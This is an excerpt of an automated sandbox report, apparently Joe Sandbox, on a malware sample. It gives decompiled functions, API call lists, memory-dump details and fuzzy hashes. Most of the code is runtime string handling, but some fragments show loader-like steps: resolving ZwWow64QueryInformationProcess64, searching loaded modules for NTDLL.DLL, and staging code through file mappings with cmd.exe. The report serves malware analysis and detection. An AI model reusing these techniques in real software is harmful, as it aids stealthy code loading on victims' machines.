0x00412c25
0x00412c27
0x00000000
0x00412c2d
0x00412c2d
0x00412c72
0x00412c72
0x00412c75
0x00412c78
0x00000000
0x00000000
0x00412c91
0x00412d79
0x00412d7c
0x00412d81
0x00000000
0x00412d84
0x00412c97
0x00412cab
0x00412caf
0x00412cb2
0x00000000
0x00000000
0x00412cbe
0x00412ce9
0x00412ceb
0x00412d32
0x00412d32
0x00412d32
0x00412d34
0x00412d34
0x00412d36
0x00412d46
0x00412d4c
0x00412d4e
0x00412d50
0x00412d53
0x00412d54
0x00412d55
0x00412d5b
0x00412d5e
0x00412d57
0x00412d57
0x00412d58
0x00412d58
0x00412d6f
0x00412d6f
0x00412d73
0x00412d78
0x00000000
0x00412d36
0x00412cf1
0x00412cf2
0x00412cf4
0x00412cf7
0x00000000
0x00000000
0x00412cf9
0x00412cf9
0x00412cfd
0x00412d02
0x00412d1b
0x00412d20
0x00412d23
0x00412d25
0x00412d2b
0x00412d2b
0x00412d2b
0x00412d2e
0x00000000
0x00412d2e
0x00412d04
0x00412d09
0x00412d0b
0x00412d0d
0x00000000
0x00000000
0x00412d0f
0x00412d15
0x00000000
0x00412d15
0x00412cc3
0x00412ce2
0x00412ce2
0x00000000
0x00412cc3
0x00412c33
0x00412c34
0x00412c39
0x00000000
0x00000000
0x00412c3b
0x00412c3b
0x00412c44
0x00412c5a
0x00412c5f
0x00412c62
0x00412c6d
0x00412c6d
0x00000000
0x00412c6d
0x00412c64
0x00412c6a
0x00412c6a
0x00000000
0x00412c6a
0x00412c46
0x00412c4b
0x00412c4f
0x00000000
0x00000000
0x00412c51
0x00000000
0x00412c51
0x00412c27
0x00412bd9
0x00412baf
0x00412bb2
0x00412bb5
0x00412bb5
0x00412bb8
0x00000000
0x00000000
0x00412bba
0x00412bbd
0x00000000
0x00000000
0x00412bbf
0x00000000
0x00412bbf
0x00412bc7
0x00412bcb
0x00412bcd
0x00412bcd
0x00412bce
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,00418118,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,00000001,00000000), ref: 00412B83
GetLastError.KERNEL32 ref: 00412B95
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,00000001,00000000), ref: 00412C21
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 00412C8D
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 00412CA9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00412CE2
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00412D46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00412D69

Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(7FFFFFFF,00001004,00000000,00000006,00000000,7FFFFFFF,00000000,?,?,?,00410C10,01D31728,?,?), ref: 004134D2

LCMapStringA.KERNEL32 ref: 00412DF9

Part of subcall function 0040C70A: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001), ref: 0040C782

LCMapStringA.KERNEL32 ref: 00412E6B
LCMapStringA.KERNEL32 ref: 00412EB8

Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93

Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,0041311E,00000001,?,00000000,?,?,?), ref: 00413540
Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000001,?,0041311E,00000001,?), ref: 00413559
Part of subcall function 004134F7: _strlen.LIBCMT ref: 00413577
Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,00000000,00000000,?,0041311E,00000001,?,00000000,?,?,?,?,00000000), ref: 004135B7
Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,?,00000000,?,?,?,?,?,?,?,0041311E,00000001,?), ref: 00413606
Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413621
Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413647
Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 0041366C

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ByteCharMultiWide$String$Info$ErrorExceptionFilterHeapLastProcessUnhandled$AllocCurrentDebuggerFreeLocalePresentTerminate_strlen
String ID:
API String ID: 2570851594-0
Opcode ID: 19bf860d114eb2898dda6a3995bf19210764c8e40c0971d6ad4241651fe780e5
Instruction ID: add9e604773e98e0779d4ea288a642ae63b3a42f9b82ecacdf1b385bd7247509
Opcode Fuzzy Hash: 19bf860d114eb2898dda6a3995bf19210764c8e40c0971d6ad4241651fe780e5
Instruction Fuzzy Hash: 77B17D7290010AAFCF219F94DE808EF7BB5FB08354B14452BF905E2260D7798DA1DBA9

Function 002D196E, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 202filestringsynchronization

APIs

Part of subcall function 002D4111: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002D4160

Part of subcall function 002D3CEB: lstrlen.KERNEL32(00000000,00000000,002DA05C,00000027,?,?,00000000,00000000,?,002DA05C,00000000,00000000), ref: 002D3D21
Part of subcall function 002D3CEB: lstrcpy.KERNEL32(00000000,00000000), ref: 002D3D45
Part of subcall function 002D3CEB: lstrcat.KERNEL32(00000000,00000000), ref: 002D3D4D

Part of subcall function 002D3A46: CloseHandle.KERNEL32(00000000), ref: 002D3AF8

Part of subcall function 002D1882: memset.NTDLL ref: 002D18F8
Part of subcall function 002D1882: memcpy.NTDLL(00000000,00000000,?,?,?,00000000,?,002DA05C,00000000,00000000), ref: 002D190E
Part of subcall function 002D1882: memcpy.NTDLL(75F211F8,00000000,?,?,?,?,?,?,00000000,?,002DA05C,00000000,00000000), ref: 002D1942

CloseHandle.KERNEL32(?), ref: 002D1BA7

Part of subcall function 002D1538: HeapFree.KERNEL32(00000000,00000000,?), ref: 002D15A2

Part of subcall function 002D3D62: WaitForSingleObject.KERNEL32(00000000,?), ref: 002D3E3C

GetCurrentProcessId.KERNEL32(?,00000058,?,?,?,?,002DC65A,00000000,?,002DA05C,00000000,00000000), ref: 002D1A6F
OpenFileMappingW.KERNEL32(00000004,00000000,?), ref: 002D1A92
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 002D1AA6
CloseHandle.KERNEL32(00000000), ref: 002D1AB3
lstrlenW.KERNEL32(00000000), ref: 002D1ABE

Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C

CreateEventA.KERNEL32(002DB25C,00000001,00000000,00000000,002DC767,00000001), ref: 002D1B38

Part of subcall function 002D1015: HeapFree.KERNEL32(00000000,?,002D46C4), ref: 002D1021

Part of subcall function 002D1348: memset.NTDLL ref: 002D1364
Part of subcall function 002D1348: GetLastError.KERNEL32 ref: 002D1399

WaitForSingleObject.KERNEL32(?,00007530), ref: 002D1B79

Strings

cmd.exe, xrefs: 002D1AE2

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$CloseFreeHandle$FileObjectSingleWaitlstrlenmemcpymemset$AllocateCreateCurrentErrorEventLastMappingOpenProcessViewlstrcatlstrcpy
String ID: cmd.exe
API String ID: 2483582587-723907552
Opcode ID: 394d9d1fa885e21be980f15b46b7eaa39ae2def6e8366611ad9790346fac38fd
Instruction ID: 3b9d358a08dba1e82b849182d93e135a66e291b770f022dc258d602b82da5b9b
Opcode Fuzzy Hash: 394d9d1fa885e21be980f15b46b7eaa39ae2def6e8366611ad9790346fac38fd
Instruction Fuzzy Hash: C4615971D2120AFBDB10EFA0DD99AAEBBB8AF04345F10406BE545E3650EB749E60CB51

Function 0040247A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
memorystring

C-Code - Quality: 100%

			E0040247A(signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v0;
				long _v4;
				char _v8;
				signed int _v12;
				long _v20;
				long _v24;
				void* _t37;
				intOrPtr* _t40;
				intOrPtr* _t41;
				char* _t42;
				CHAR* _t48;
				long _t52;
				void* _t53;
				void* _t55;

				_v12 = 2;
				E00401EFE(_a4, 0, 0,  &_v8);
				_t52 = _v24;
				_v20 = _t52;
				_t55 = VirtualAlloc(0, _t52, 0x3000, 4);
				if(_t55 == 0) {
					L15:
					_v12 = 8;
					L16:
					if(_t55 != 0) {
						VirtualFree(_t55, 0, 0x8000);
					}
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t37 = E00401EFE(_a4, _t55, _t52,  &_v8);
					_t52 = _v24;
					if(_t37 != 0 || _v4 >= _t52) {
						break;
					}
					_v4 = _t52;
					VirtualFree(_t55, 0, 0x8000);
					_t55 = VirtualAlloc(0, _t52, 0x3000, 4);
					if(_t55 != 0) {
						continue;
					}
					break;
				}
				if(_t55 == 0 || _v4 < _t52) {
					goto L15;
				} else {
					_a4 = _a4 & 0x00000000;
					_t14 = _t55 + 8; // 0x8
					_t53 = _t14;
					if( *_t55 <= 0) {
						goto L16;
					}
					while(1) {
						_t48 = ( *(_t53 + 0x1e) & 0x0000ffff) + _t53 + 0x20;
						if(lstrcmpiA(_t48, ?str?) == 0) {
							break;
						}
						_t42 = StrChrA(_t48, 0x2e);
						if(_t42 == 0) {
							L11:
							_t53 = _t53 + 0x120;
							_v0 = _v0 + 1;
							if(_v0 <  *_t55) {
								continue;
							}
							goto L16;
						}
						 *_t42 = 0;
						if(lstrcmpiA(_t48, ?str?) == 0) {
							break;
						}
						goto L11;
					}
					_t40 = _a8;
					_v12 = _v12 & 0x00000000;
					 *_t40 =  *((intOrPtr*)(_t53 + 8));
					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t53 + 0xc));
					_t41 = _a12;
					if(_t41 != 0) {
						 *_t41 =  *((intOrPtr*)(_t53 + 0x10));
					}
					goto L16;
				}
			}

0x0040248e
0x00402496
0x0040249b
0x004024af
0x004024b5
0x004024b9
0x00402585
0x00402585
0x0040258d
0x0040258f
0x00402599
0x00402599
0x004025aa
0x00000000
0x00000000
0x00000000
0x004024bf
0x004024bf
0x004024ca
0x004024d1
0x004024d5
0x00000000
0x00000000
0x004024e5
0x004024e9
0x004024f7
0x004024fb
0x00000000
0x00000000
0x00000000
0x004024fb
0x004024ff
0x00000000
0x0040250b
0x0040250b
0x00402513
0x00402513
0x00402516
0x00000000
0x00000000
0x0040251e
0x00402522
0x00402530
0x00000000
0x00000000
0x00402535
0x0040253d
0x0040254e
0x0040254e
0x00402554
0x0040255e
0x00000000
0x00000000
0x00000000
0x00402560
0x00402545
0x0040254c
0x00000000
0x00000000
0x00000000
0x0040254c
0x00402565
0x00402569
0x0040256e
0x00402573
0x00402576
0x0040257c
0x00402581
0x00402581
0x00000000
0x0040257c

APIs

Part of subcall function 00401EFE: GetProcAddress.KERNEL32(ZwWow64QueryInformationProcess64,00000318,00000000,00000000), ref: 00401F1C
Part of subcall function 00401EFE: StrRChrA.SHLWAPI(00000018,00000000,0000005C), ref: 004020A2

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004024B3
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,00000000), ref: 004024E9
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004024F5
lstrcmpiA.KERNEL32(?,NTDLL.DLL,?,00000000,00000000,00000000), ref: 0040252C
StrChrA.SHLWAPI(?,0000002E), ref: 00402535
lstrcmpiA.KERNEL32(?,NTDLL.DLL), ref: 00402548
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402599

Strings

NTDLL.DLL, xrefs: 00402526, 0040253F

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressProc
String ID: NTDLL.DLL
API String ID: 1783538721-1613819793
Opcode ID: b6a3f740ebdcc39fdef97803f54a0bbce7d4c91b6f73e8fe06d467f6e6b62376
Instruction ID: 69a9618142ac30a13302b788f7181d4e7df1a241669798df9a30e95198f9b9aa
Opcode Fuzzy Hash: b6a3f740ebdcc39fdef97803f54a0bbce7d4c91b6f73e8fe06d467f6e6b62376
Instruction Fuzzy Hash: 06316271505311ABD3218F15DE49F1BBBE8EB88B54F11092AF944B72D0D7B8E904CBAE

Function 002D13AD, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83memorystring

APIs

lstrlen.KERNEL32(@CODE@,00000000,?,00000000,002DA05C), ref: 002D13E9
RtlAllocateHeap.NTDLL(00000000,?), ref: 002D1419
memcpy.NTDLL(00000000,00000000,00000000), ref: 002D142B
memcpy.NTDLL(0000000B,00000000,00000000,00000000,00000000,00000000), ref: 002D143C
memcpy.NTDLL(00000000,00000000,?,0000000B,00000000,00000000,00000000,00000000,00000000), ref: 002D1456
HeapFree.KERNEL32(00000000,00000000), ref: 002D1467

Strings

@CODE@, xrefs: 002D13DB, 002D13E0, 002D13EF
Fv, xrefs: 002D1419

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: memcpy$Heap$AllocateFreelstrlen
String ID: @CODE@$Fv
API String ID: 1753103609-962893422
Opcode ID: 10544f26649173e644cd73b6deb4b70a5fb1f1e327e8ee51c5cc0b9223b45aca
Instruction ID: 597d4196e8bf934d94d10985bdd840f4c5a6e179fdbc0872fafd0aab5fe72dce
Opcode Fuzzy Hash: 10544f26649173e644cd73b6deb4b70a5fb1f1e327e8ee51c5cc0b9223b45aca
Instruction Fuzzy Hash: 02318076A14249BFCB118FA9DC88B9EBFB9EF88314F14405AF844A7351C6719D24CB60

Function 00410859, Relevance: 13.8, APIs: 9, Instructions: 341

C-Code - Quality: 93%

			E00410859(int __ecx, int __edx, int _a4, int _a8, int _a12, char* _a16, int _a20, int _a24) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				char* _v32;
				signed int _v36;
				char* _v40;
				short* _v44;
				int _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t93;
				int _t96;
				int _t99;
				short* _t113;
				short* _t115;
				short* _t118;
				signed int _t121;
				void* _t123;
				short* _t124;
				signed int _t126;
				void* _t128;
				short* _t129;
				char* _t131;
				char* _t134;
				signed int _t136;
				signed int _t139;
				long _t144;
				int _t145;
				int _t149;
				char _t159;
				void* _t160;
				signed int _t163;
				signed int _t164;
				short* _t168;
				signed int _t170;
				short* _t171;
				void* _t175;

				_t165 = __edx;
				_t93 =  *0x42c4a0; // 0xe190ffa3
				_v8 = _t93 ^ _t170;
				_t168 = 0;
				_t175 =  *0x436694 - _t168; // 0x0
				_t145 = __edx;
				_t169 = __ecx;
				_v40 = __edx;
				_v32 = _a16;
				if(_t175 == 0) {
					if(CompareStringW(0, 0, 0x418118, 1, 0x418118, 1) == 0) {
						_t144 = GetLastError();
						__eflags = _t144 - 0x78;
						if(_t144 == 0x78) {
							 *0x436694 = 2;
						}
					} else {
						 *0x436694 = 1;
					}
				}
				if(_a12 <= _t168) {
					__eflags = _a12 - 0xffffffff;
					if(_a12 >= 0xffffffff) {
						L11:
						_t165 = _a20;
						if(_t165 <= _t168) {
							__eflags = _t165 - 0xffffffff;
							if(_t165 < 0xffffffff) {
								goto L18;
							}
							L20:
							_t149 =  *0x436694; // 0x0
							if(_t149 == 2 || _t149 == _t168) {
								_t168 = 0;
								_t145 = 0;
								__eflags = _a4;
								if(_a4 == 0) {
									_a4 =  *((intOrPtr*)( *_t169 + 0x14));
								}
								__eflags = _a24 - _t168;
								if(_a24 == _t168) {
									_a24 =  *((intOrPtr*)( *_t169 + 4));
								}
								_t169 = E004134B0(_t145, _t165, _t168, _t169, _a4);
								__eflags = _t169 - 0xffffffff;
								if(_t169 != 0xffffffff) {
									__eflags = _t169 - _a24;
									if(_t169 == _a24) {
										L89:
										_t99 = CompareStringA(_a4, _a8, _v40, _a12, _v32, _a20);
										__eflags = _t145;
										_t169 = _t99;
										if(__eflags != 0) {
											_push(_t145);
											E00410D1A(_t145, _t168, _t169, __eflags);
											_push(_t168);
											E00410D1A(_t145, _t168, _t169, __eflags);
										}
										_t96 = _t169;
										goto L92;
									}
									_t145 = E004134F7(_t165, _a24, _t169, _v40,  &_a12, 0, 0);
									__eflags = _t145;
									if(_t145 == 0) {
										goto L18;
									}
									_t168 = E004134F7(_t165, _a24, _t169, _v32,  &_a20, 0, 0);
									__eflags = _t168;
									if(__eflags != 0) {
										_v40 = _t145;
										_v32 = _t168;
										goto L89;
									}
									_push(_t145);
									E00410D1A(_t145, _t168, _t169, __eflags);
								}
								goto L18;
							} else {
								_t96 = 1;
								if(_t149 != 1) {
									goto L18;
								}
								_v44 = _t168;
								if(_a24 == _t168) {
									_a24 =  *((intOrPtr*)( *_t169 + 4));
								}
								if(_a12 == _t168 || _t165 == _t168) {
									if(_a12 != _t165) {
										__eflags = _t165 - _t96;
										if(_t165 > _t96) {
											goto L92;
										}
										__eflags = _a12 - _t96;
										if(_a12 <= _t96) {
											_t113 = GetCPInfo(_a24,  &_v28);
											__eflags = _t113;
											if(_t113 == 0) {
												goto L18;
											}
											__eflags = _a12 - _t168;
											if(_a12 <= _t168) {
												__eflags = _a20 - _t168;
												if(_a20 <= _t168) {
													goto L51;
												}
												__eflags = _v28 - 2;
												if(_v28 >= 2) {
													__eflags = _v22;
													_t131 =  &_v22;
													if(_v22 == 0) {
														goto L44;
													} else {
														goto L46;
													}
													while(1) {
														L46:
														_t165 =  *((intOrPtr*)(_t131 + 1));
														__eflags = _t165;
														if(_t165 == 0) {
															goto L44;
														}
														_t159 =  *_v32;
														__eflags = _t159 -  *_t131;
														if(_t159 <  *_t131) {
															L49:
															_t131 = _t131 + 2;
															__eflags =  *_t131;
															if( *_t131 != 0) {
																continue;
															}
															goto L44;
														}
														__eflags = _t159 - _t165;
														if(_t159 <= _t165) {
															goto L28;
														}
														goto L49;
													}
												}
												L44:
												_t96 = 1;
												goto L92;
											}
											__eflags = _v28 - 2;
											if(_v28 < 2) {
												goto L32;
											}
											__eflags = _v22;
											_t134 =  &_v22;
											if(_v22 == 0) {
												goto L32;
											} else {
												goto L37;
											}
											while(1) {
												L37:
												_t165 =  *((intOrPtr*)(_t134 + 1));
												__eflags = _t165;
												if(_t165 == 0) {
													goto L32;
												}
												_t160 =  *_t145;
												__eflags = _t160 -  *_t134;
												if(_t160 <  *_t134) {
													L40:
													_t134 = _t134 + 2;
													__eflags =  *_t134;
													if( *_t134 != 0) {
														continue;
													}
													goto L32;
												}
												__eflags = _t160 - _t165;
												if(_t160 <= _t165) {
													goto L28;
												}
												goto L40;
											}
										}
										L32:
										_push(3);
										L29:
										_pop(_t96);
										goto L92;
									}
									L28:
									_push(2);
									goto L29;
								} else {
									L51:
									_t169 = MultiByteToWideChar;
									_t145 = MultiByteToWideChar(_a24, 9, _t145, _a12, _t168, _t168);
									__eflags = _t145 - _t168;
									_v48 = _t145;
									if(_t145 == _t168) {
										goto L18;
									}
									__eflags = _t145;
									_t168 = 0x400;
									if(_t145 <= 0) {
										L61:
										_t43 =  &_v36;
										 *_t43 = _v36 & 0x00000000;
										__eflags =  *_t43;
										L62:
										__eflags = _v36;
										if(_v36 == 0) {
											goto L18;
										}
										_t115 = MultiByteToWideChar(_a24, 1, _v40, _a12, _v36, _t145);
										__eflags = _t115;
										if(_t115 == 0) {
											L78:
											E0041083E(_v36);
											_t96 = _v44;
											L92:
											return E0040FE9A(_t96, _t145, _v8 ^ _t170, _t165, _t168, _t169);
										}
										_t145 = MultiByteToWideChar(_a24, 9, _v32, _a20, 0, 0);
										__eflags = _t145;
										if(__eflags == 0) {
											goto L78;
										}
										if(__eflags <= 0) {
											L73:
											_t168 = 0;
											__eflags = 0;
											L74:
											__eflags = _t168;
											if(_t168 != 0) {
												_t118 = MultiByteToWideChar(_a24, 1, _v32, _a20, _t168, _t145);
												__eflags = _t118;
												if(_t118 != 0) {
													_v44 = CompareStringW(_a4, _a8, _v36, _v48, _t168, _t145);
												}
												E0041083E(_t168);
											}
											goto L78;
										}
										_t121 = 0xffffffe0;
										_t165 = _t121 % _t145;
										__eflags = _t121 / _t145 - 2;
										if(_t121 / _t145 < 2) {
											goto L73;
										}
										_t58 = _t145 + 8; // 0x8
										_t123 = _t145 + _t58;
										__eflags = _t123 - _t168;
										if(_t123 > _t168) {
											_t124 = E0040C70A(_t145, _t165, _t168, _t169, _t123);
											__eflags = _t124;
											if(_t124 != 0) {
												 *_t124 = 0xdddd;
												_t124 =  &(_t124[4]);
												__eflags = _t124;
											}
											_t168 = _t124;
											goto L74;
										}
										E004136B0(_t123);
										_t168 = _t171;
										__eflags = _t168;
										if(_t168 == 0) {
											goto L78;
										}
										 *_t168 = 0xcccc;
										_t168 =  &(_t168[4]);
										goto L74;
									}
									_t126 = 0xffffffe0;
									_t165 = _t126 % _t145;
									__eflags = _t126 / _t145 - 2;
									if(_t126 / _t145 < 2) {
										goto L61;
									}
									_t41 = _t145 + 8; // 0x8
									_t128 = _t145 + _t41;
									__eflags = _t128 - 0x400;
									if(_t128 > 0x400) {
										_t129 = E0040C70A(_t145, _t165, 0x400, MultiByteToWideChar, _t128);
										__eflags = _t129;
										if(_t129 == 0) {
											L60:
											_v36 = _t129;
											goto L62;
										}
										 *_t129 = 0xdddd;
										L59:
										_t129 =  &(_t129[4]);
										__eflags = _t129;
										goto L60;
									}
									E004136B0(_t128);
									_t129 = _t171;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L60;
									}
									 *_t129 = 0xcccc;
									goto L59;
								}
							}
						}
						_t136 = _v32;
						_t163 = _t165;
						while(1) {
							_t163 = _t163 - 1;
							if( *_t136 == 0) {
								break;
							}
							_t136 = _t136 + 1;
							if(_t163 != _t168) {
								continue;
							}
							_t163 = _t163 | 0xffffffff;
							break;
						}
						_t165 = _t165 + (_t136 | 0xffffffff) - _t163;
						_a20 = _t165;
						goto L20;
					}
					L18:
					_t96 = 0;
					goto L92;
				}
				_t164 = _a12;
				_t139 = _t145;
				while(1) {
					_t164 = _t164 - 1;
					if( *_t139 == 0) {
						break;
					}
					_t139 = _t139 + 1;
					if(_t164 != _t168) {
						continue;
					}
					_t164 = _t164 | 0xffffffff;
					break;
				}
				_a12 = _a12 + (_t139 | 0xffffffff) - _t164;
				goto L11;
			}

0x00410859
0x0041085f
0x00410866
0x0041086f
0x00410871
0x00410877
0x00410879
0x0041087b
0x0041087e
0x00410881
0x00410898
0x004108a6
0x004108ac
0x004108af
0x004108b1
0x004108b1
0x0041089a
0x0041089a
0x0041089a
0x00410898
0x004108be
0x00410901
0x00410905
0x004108db
0x004108db
0x004108e0
0x0041090e
0x00410911
0x00000000
0x00000000
0x00410913
0x00410913
0x0041091c
0x00410b1b
0x00410b1d
0x00410b1f
0x00410b22
0x00410b29
0x00410b29
0x00410b2c
0x00410b2f
0x00410b36
0x00410b36
0x00410b41
0x00410b43
0x00410b47
0x00410b4d
0x00410b50
0x00410ba2
0x00410bb4
0x00410bba
0x00410bbc
0x00410bbe
0x00410bc0
0x00410bc1
0x00410bc6
0x00410bc7
0x00410bcd
0x00410bce
0x00000000
0x00410bce
0x00410b66
0x00410b6b
0x00410b6d
0x00000000
0x00000000
0x00410b87
0x00410b8c
0x00410b8e
0x00410b9c
0x00410b9f
0x00000000
0x00410b9f
0x00410b90
0x00410b91
0x00410b96
0x00000000
0x0041092a
0x0041092c
0x0041092f
0x00000000
0x00000000
0x00410934
0x00410937
0x0041093e
0x0041093e
0x00410944
0x00410951
0x0041095b
0x0041095d
0x00000000
0x00000000
0x00410963
0x00410966
0x00410973
0x00410979
0x0041097b
0x00000000
0x00000000
0x0041097d
0x00410980
0x004109ab
0x004109ae
0x00000000
0x00000000
0x004109b0
0x004109b4
0x004109be
0x004109c2
0x004109c5
0x00000000
0x00000000
0x00000000
0x00000000
0x004109c7
0x004109c7
0x004109c7
0x004109ca
0x004109cc
0x00000000
0x00000000
0x004109d1
0x004109d3
0x004109d5
0x004109df
0x004109e0
0x004109e1
0x004109e4
0x00000000
0x00000000
0x00000000
0x004109e6
0x004109d7
0x004109d9
0x00000000
0x00000000
0x00000000
0x004109d9
0x004109c7
0x004109b6
0x004109b8
0x00000000
0x004109b8
0x00410982
0x00410986
0x00000000
0x00000000
0x00410988
0x0041098c
0x0041098f
0x00000000
0x00000000
0x00000000
0x00000000
0x00410991
0x00410991
0x00410991
0x00410994
0x00410996
0x00000000
0x00000000
0x00410998
0x0041099a
0x0041099c
0x004109a2
0x004109a3
0x004109a4
0x004109a7
0x00000000
0x00000000
0x00000000
0x004109a9
0x0041099e
0x004109a0
0x00000000
0x00000000
0x00000000
0x004109a0
0x00410991
0x00410968
0x00410968
0x00410955
0x00410955
0x00000000
0x00410955
0x00410953
0x00410953
0x00000000
0x004109e8
0x004109e8
0x004109e8
0x004109fb
0x004109fd
0x004109ff
0x00410a02
0x00000000
0x00000000
0x00410a08
0x00410a0a
0x00410a0f
0x00410a51
0x00410a51
0x00410a51
0x00410a51
0x00410a55
0x00410a55
0x00410a59
0x00000000
0x00000000
0x00410a6e
0x00410a70
0x00410a72
0x00410b0a
0x00410b0d
0x00410b12
0x00410bd0
0x00410be1
0x00410be1
0x00410a89
0x00410a8b
0x00410a8d
0x00000000
0x00000000
0x00410a8f
0x00410ad3
0x00410ad3
0x00410ad3
0x00410ad5
0x00410ad5
0x00410ad7
0x00410ae6
0x00410ae8
0x00410aea
0x00410b00
0x00410b00
0x00410b04
0x00410b09
0x00000000
0x00410ad7
0x00410a95
0x00410a96
0x00410a98
0x00410a9b
0x00000000
0x00000000
0x00410a9d
0x00410a9d
0x00410aa1
0x00410aa3
0x00410abc
0x00410ac1
0x00410ac4
0x00410ac6
0x00410acc
0x00410acc
0x00410acc
0x00410acf
0x00000000
0x00410acf
0x00410aa5
0x00410aaa
0x00410aac
0x00410aae
0x00000000
0x00000000
0x00410ab0
0x00410ab6
0x00000000
0x00410ab6
0x00410a15
0x00410a16
0x00410a18
0x00410a1b
0x00000000
0x00000000
0x00410a1d
0x00410a1d
0x00410a21
0x00410a23
0x00410a39
0x00410a3e
0x00410a41
0x00410a4c
0x00410a4c
0x00000000
0x00410a4c
0x00410a43
0x00410a49
0x00410a49
0x00410a49
0x00000000
0x00410a49
0x00410a25
0x00410a2a
0x00410a2c
0x00410a2e
0x00000000
0x00000000
0x00410a30
0x00000000
0x00410a30
0x00410944
0x0041091c
0x004108e2
0x004108e5
0x004108e7
0x004108e7
0x004108eb
0x00000000
0x00000000
0x004108ed
0x004108f0
0x00000000
0x00000000
0x004108f2
0x00000000
0x004108f2
0x004108fa
0x004108fc
0x00000000
0x004108fc
0x00410907
0x00410907
0x00000000
0x00410907
0x004108c0
0x004108c3
0x004108c5
0x004108c5
0x004108c9
0x00000000
0x00000000
0x004108cb
0x004108ce
0x00000000
0x00000000
0x004108d0
0x00000000
0x004108d0
0x004108d8
0x00000000

APIs

CompareStringW.KERNEL32 ref: 00410890
GetLastError.KERNEL32(?,?,?,00410C10,01D31728,?,?,?,?,?,00418BD0,?,01D31728,00418BD0,00418BD0,00418BD0), ref: 004108A6
GetCPInfo.KERNEL32(01D31728,?,00000000,7FFFFFFF,00000000,?,?,?,00410C10,01D31728,?,?), ref: 00410973
MultiByteToWideChar.KERNEL32(01D31728,00000009,00418BD0,000000FF,00000000,00000000,?,?,?,00410C10,01D31728,?,?), ref: 004109F9
MultiByteToWideChar.KERNEL32(01D31728,00000001,?,000000FF,00000000,00000000), ref: 00410A6E
